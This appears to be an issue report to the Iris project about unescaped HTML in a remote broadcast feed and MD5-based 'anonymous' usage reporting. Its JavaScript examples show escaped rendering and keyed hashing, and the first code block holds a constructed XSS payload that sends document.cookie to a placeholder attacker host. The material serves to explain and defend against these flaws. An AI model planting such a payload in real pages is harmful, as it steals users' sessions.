Description
I'd like to start with a clarification: I ignored the issue template as it does not seem fit for this kind of issue, and this issue is based on a couple of observations, as I do not really know how to work with React.
I've been using Iris for a while now, and while setting up a reverse proxy to expose it to my local network "nicely" I noticed that it makes requests to a gist. Upon further investigation I saw that it is used as a broadcast system. The concern is raised by the anchor in it. Since the anchor did not get escaped (and hence we got a link in the broadcast), it leads me to believe that no XSS prevention is in place. In that case, the broadcast system could be abused, either by you or by a malicious party that gained control over your account, to gather information about the user.
Side note, on the topic of gathering information about the user: MD5 is unacceptable as a hash for any private information, let alone authentication details. Because of MD5 I decided to opt out of the usage reporting program, which I have a hard time calling anonymous. Please switch the algorithm for something more appropriate (say SHA256, assuming you don't take passwords, and even then SHA256 is not considered password-safe) or stop collecting personal data, leaving in only things like stack traces and extremely generic information, such as HTTP status codes.
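The XSS concern in the report, illustrated as an added example (this is not Iris code and does not reflect how the project actually renders the gist; the broadcast payload, field names and rendering functions below are constructed for illustration). It shows the difference between interpolating untrusted broadcast text straight into markup, which is what an unescaped anchor in the rendered broadcast suggests, and escaping every untrusted field, with links allowed only as validated structured data rather than as markup from the feed:

```javascript
// Added example (not Iris project code). Rendering an untrusted broadcast
// message: unsafe raw interpolation vs. escaped output. The message object and
// the helper names are constructed for this illustration.

// Minimal HTML escaper for text placed inside element content or attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the feed's text reaches the DOM as markup. This is the
// equivalent of innerHTML / dangerouslySetInnerHTML on untrusted input,
// so any tag the feed author (or whoever controls the feed) writes is live.
function renderBroadcastUnsafe(msg) {
  return `<div class="broadcast">${msg.title}: ${msg.body}</div>`;
}

// Hardened: every untrusted field is escaped before it touches markup, so an
// anchor in the feed shows up as literal text instead of a clickable element.
function renderBroadcastSafe(msg) {
  return `<div class="broadcast">${escapeHtml(msg.title)}: ${escapeHtml(msg.body)}</div>`;
}

// If the feed is supposed to carry links, accept them as a separate structured
// field and validate the scheme; never accept markup. Non-https or unparseable
// URLs degrade to plain text.
function safeLink(href, text) {
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return escapeHtml(text);
  }
  if (url.protocol !== 'https:') return escapeHtml(text);
  return `<a href="${escapeHtml(url.href)}" rel="noopener noreferrer" target="_blank">${escapeHtml(text)}</a>`;
}

// Constructed hostile broadcast: an anchor with an inline event handler that
// exfiltrates document.cookie to an attacker-controlled host (placeholder name).
const maliciousBroadcast = {
  title: 'Update',
  body: '<a href="x" onmouseover="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">click</a>',
};

// True when the rendered HTML contains a live anchor element.
function containsLiveAnchor(html) {
  return /<a\s/.test(html);
}
```

The check to run against any renderer of the feed is the last function: a live `<a` in the output of the renderer means the feed author controls markup in every user's browser, and from there the same technique works for `<img onerror>` or `<script>` just as well as for an anchor.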
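The "anonymous" hashing concern, as an added example (not Iris code; nothing is known here about which field Iris actually hashes, so the identifiers and the dictionary are constructed). It shows why an unsalted digest of a low-entropy identifier such as a username or hostname is not anonymisation: anyone who sees the report can recover the input by hashing guesses, and swapping MD5 for SHA-256 does not change that. A keyed digest under a per-install random key that never leaves the machine (or simply not collecting the field) does:

```javascript
// Added example (not Iris project code). Reversing an unkeyed digest of a
// low-entropy identifier by dictionary attack, and the keyed alternative.
// Identifiers, dictionary and key handling are constructed for illustration.
const crypto = require('crypto');

// The reporting scheme the issue describes: a plain digest of an identifier.
// Whether algorithm is 'md5' or 'sha256' is irrelevant to the attack below.
function anonymiseUnkeyed(algorithm, identifier) {
  return crypto.createHash(algorithm).update(identifier, 'utf8').digest('hex');
}

// Keyed digest: without the key an observer cannot enumerate candidates.
// The key must be random, generated per install, and never reported.
function anonymiseKeyed(key, identifier) {
  return crypto.createHmac('sha256', key).update(identifier, 'utf8').digest('hex');
}

// Constructed attacker dictionary: usernames / hostnames an observer of the
// reports might plausibly guess. A real one would be thousands of entries.
const DICTIONARY = ['admin', 'alice', 'bob', 'carol', 'pi', 'raspberrypi', 'nas', 'homeserver', 'mopidy', 'iris'];

// Recover the identifier behind an unkeyed digest: one hash per candidate,
// which is negligible work for any dictionary of names.
function reverseUnkeyed(algorithm, digest, dictionary) {
  for (const candidate of dictionary) {
    if (anonymiseUnkeyed(algorithm, candidate) === digest) return candidate;
  }
  return null;
}

// The same attack against a keyed digest: the attacker must also guess the
// key, so a random 32-byte key makes the search infeasible.
function reverseKeyed(digest, dictionary, guessedKeys) {
  for (const key of guessedKeys) {
    for (const candidate of dictionary) {
      if (anonymiseKeyed(key, candidate) === digest) return { key, candidate };
    }
  }
  return null;
}

// Usage: what a report for user "alice" would carry under each scheme.
const installKey = crypto.randomBytes(32);
const reportedMd5 = anonymiseUnkeyed('md5', 'alice');
const reportedSha256 = anonymiseUnkeyed('sha256', 'alice');
const reportedKeyed = anonymiseKeyed(installKey, 'alice');
```

The design point is that the hash algorithm is not the variable that matters for a small input space; the key (or the absence of the field altogether) is. Even the keyed form still lets the collector correlate reports from one install over time, which is a property to state plainly in any claim of anonymity.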